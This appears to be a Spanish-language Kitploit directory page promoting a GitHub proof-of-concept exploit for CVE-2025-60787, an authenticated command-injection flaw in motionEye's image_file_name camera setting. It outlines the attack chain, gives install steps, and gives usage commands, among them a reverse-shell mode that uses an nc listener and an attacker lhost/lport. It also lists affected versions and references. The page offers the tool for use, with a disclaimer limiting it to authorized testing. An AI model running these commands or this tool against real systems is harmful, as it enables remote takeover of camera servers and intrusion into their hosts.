Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-60787 — CVE-2025-60787 motionEye PoC de RCE por inyección de comandos autenticada | Kitploit
Herramientas/GitHubGitHub/ozcanpng/cve-2025-60787
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed Teaming
GitHubozcanpng/cve-2025-60787

CVE-2025-60787

CVE-2025-60787 motionEye PoC de RCE por inyección de comandos autenticada

Ver Repositorio
2hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-60787 — motionEye RCE autenticado

PoC de inyección de comandos autenticada para CVE-2025-60787. motionEye v0.43.1b4 y versiones anteriores escriben valores de configuración de cámara controlados por el usuario, como image_file_name, en la configuración de Motion sin una sanitización suficiente, lo que permite la ejecución de comandos cuando se procesa el valor.

Solo para pruebas e investigación autorizadas. No lo utilices contra sistemas que no sean de tu propiedad o para los que no tengas permiso explícito de prueba.


Qué hace

root@kitploit:~
Signed API request -> camera config update -> image_file_name injection -> snapshot trigger -> command execution
  1. Valida el objetivo y detecta motionEye.
  2. Genera solicitudes de API firmadas de motionEye usando el nombre de usuario y el hash de contraseña configurados.
  3. Lee la configuración de la cámara mediante /config/list/.
  4. Inyecta un comando en el ajuste image_file_name de la cámara.
  • Habilita imágenes fijas/capturas manuales cuando sea necesario.
  • Dispara /action/<camera_id>/snapshot/ para que motionEye procese el nombre de archivo inyectado.
  • Opcionalmente restaura la configuración original de la cámara.

  • Capturas de pantalla

    Configuración de reverse shell

    Configuración de reverse shell

    Inyección de configuración y disparo

    Inyección de configuración y disparo

    Shell recibida

    Shell recibida


    Instalación

    root@kitploit:~
    git clone https://github.com/ozcanpng/CVE-2025-60787.git
    cd CVE-2025-60787
    pip install -r requirements.txt
    

    Uso

    Prueba segura de comando

    root@kitploit:~
    python3 CVE-2025-60787.py \
      --target http://127.0.0.1:8765 \
      --user admin \
      --password-hash HASH \
      --cmd 'id > /tmp/motioneye_rce'
    

    Reverse shell

    Inicia primero un listener:

    root@kitploit:~
    rlwrap nc -lvnp 4444
    

    Después ejecuta:

    root@kitploit:~
    python3 CVE-2025-60787.py \
      --target http://127.0.0.1:8765 \
      --port 8765 \
      --user admin \
      --password-hash HASH \
      --reverse-shell \
      --lhost 10.10.16.53 \
      --lport 4444
    

    Opciones útiles:

    root@kitploit:~
    --camera-id N      Camera ID to modify (default: 1)
    --restore          Restore the original camera configuration after triggering
    --dry-run          Build signed requests without modifying the target
    --debug            Print canonical signed paths, bodies and signatures
    --no-trigger       Update config without triggering a snapshot
    --verify-tls       Verify HTTPS certificates
    --yes              Skip reverse-shell confirmation prompt
    

    Afectados

    ProductoVersión afectadaAcceso requeridoImpacto
    motionEye<= 0.43.1b4Acceso autenticado de administrador/APIEjecución de comandos del sistema operativo como el usuario del proceso motionEye/Motion

    El privilegio resultante depende de cómo esté desplegado motionEye. En contenedores o imágenes de laboratorio que ejecutan el servicio como root, la ejecución de comandos puede terminar como root.


    Notas

    • El PoC espera el valor/hash de la contraseña almacenada de motionEye porque ese valor se usa como clave de firma para las solicitudes heredadas de la API.
    • El campo inyectado es image_file_name.
    • Usa --restore durante las pruebas para volver a poner la configuración original de la cámara después de la explotación.
    • Prefiere --cmd para una validación segura antes de intentar una reverse shell.

    Referencias

    • NVD — CVE-2025-60787
    • GitHub Security Advisory — GHSA-j945-qm58-4gjx
    • motionEye project

    Autor

    ozcanpng — github.com/ozcanpng — ozcanpng.dev

    Descargar herramienta